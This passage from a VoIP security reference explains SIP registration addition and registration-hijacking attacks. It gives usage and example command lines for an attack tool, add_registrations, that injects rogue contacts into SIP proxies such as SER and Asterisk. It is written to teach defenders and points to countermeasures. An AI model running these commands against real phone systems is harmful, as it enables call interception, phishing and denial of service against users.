The registration managed within the SIP proxy/registrar can have more than one contact, allowing a user to register multiple locations, such as their office, a conference room, a lab, and so on, all of which can ring when an inbound call arrives. When multiple SIP phones ring, the first one to go off hook will answer the call. This behavior creates the opportunity for several types of attacks. For example, you could add a bunch of contacts for each user , causing many SIP phones to ring for each inbound call, irritating and confusing users. You could also add the address of a SIP phone that you have access to and then quickly pick it up when it rings, thereby performing a basic registration hijack .
To demonstrate this attack, we developed the add_registrations tool. This tool sends a properly crafted REGISTER request, containing a new contact for a user. The usage information for this tool is as follows :
add_registrations: ./add_registrations EthernetInterface NewContactUser NewContactIP TargetDomainIP DestinationIP Usage Example: ./add_registrations eth0 3000 10.1.101.30 10.1.101.2 10.1.101.35 e h -v Mandatory parameters: EthernetInterface - the Ethernet interface, e.g., eth0. NewContactUser - john.doe or 5000 or "1+210-555-1212". NewContactName the IPV4 address of the new contact. TargetDomain The IPV4 address of the SIP proxy to which the REGISTER request will be sent. DestinationIP IPV4 address of the target SIP phone/user. Optional Parameters: -e Includes the current contact in the REGISTER request. This is needed for some SIP proxies, which replaces, rather than adds the new contact. -h Help Prints this usage information. -v Verbose Enables verbose output.
This tool was tested against each of the SIP proxies. The SIP proxies behave differently. The SER SIP proxy adds the new contact. The Asterisk SIP proxy replaces the current contact with the new one. You must use the -e parameter for the Asterisk SIP proxy. This causes the add_registrations tool to send two contacts (the current and new one). This behavior prevents you from using the add_registrations tool to add more than one new contact for the Asterisk SIP proxy. The tool could be modified to accept a list of new contacts.
You can add one or more contacts for one or more SIP phones, so that when the intended user receives an inbound call, multiple SIP phones will ring. When this attack is repeated for multiple SIP phones, so many SIP phones will be constantly ringing that the wrong user will answer the call, confusing the caller and callee. The following commands add three contacts (for the SER SIP proxy) and one contact (for the Asterisk SIP proxy) to an existing SIP phone:
./add_registrations eth0 3000 10.1.101.30 10.1.101.2 10.1.101.45 ./add_registrations eth0 3500 10.1.101.35 10.1.101.2 10.1.101.45 ./add_registrations eth0 4000 10.1.101.40 10.1.101.2 10.1.101.45 ./add_registrations eth0 6000 10.1.101.60 10.1.101.1 10.1.101.65 e
In the first example, when an inbound call to extension 4500 occurs, four SIP phones will ring. The first user who goes off hook will answer the call. This example can easily be expanded to add multiple contacts for every phone.
The add_registrations tool can be used to add a new contact, performing a basic registration hijacking attack. Registration hijacking is covered in detail in the next section. This new contact would be for a SIP phone accessible to the attacker, who can answer the call more quickly than the actual user. This attack could be used very effectively if the target user is away from their SIP phone. Here are a couple of example commands:
./add_registrations eth0 3000 10.1.101.30 10.1.101.2 10.1.101.35 ./add_registrations eth0 6000 10.1.101.60 10.1.101.1 10.1.101.65 e
These commands add an additional contact, extensions 3000 and 6000, to extensions 3500 and 6500. When an inbound call to extension 3500 or 6500 is made, two SIP phones will ring, at extensions 3000 and 3500 or extensions 6000 and 6500. An attacker at extension 3000 or 6000 can answer the call quickly, thereby denying service to the intended user and possibly allowing a phishing or other attack.
Note that if you don't want the target user's SIP phone to ring at all, you can use the erase_registrations tool first. For the Asterisk SIP proxy, you can also leave off the -e parameter, which causes the command to replace the current registration with a new one.
You can also use SiVuS to add registrations. Use the Utilities screen to create a REGISTER request for the current registration while adding a new contact. Figure 13-2 illustrates this attack.
These attacks can irritate and confuse your users. In an extreme case, where multiple contacts are added for many SIP phones, it is possible for users' phones to ring continually. The registration hijacking attack can be serious as well. See the next section for more information on the impact of registration hijacking.
For these attacks to take place, the attacker needs access to your internal network, which can occur when a user downloads a worm or virus with the ability to send packets that add registrations or if an attacker gains access to the internal network through another means. The add registrations attack is also possible from a public network if you use SIP trunks for access to your voice service provider.
You can employ several countermeasures to address registration addition attacks. These countermeasures are similar to those described in the "Countermeasures" section for erasing registrations.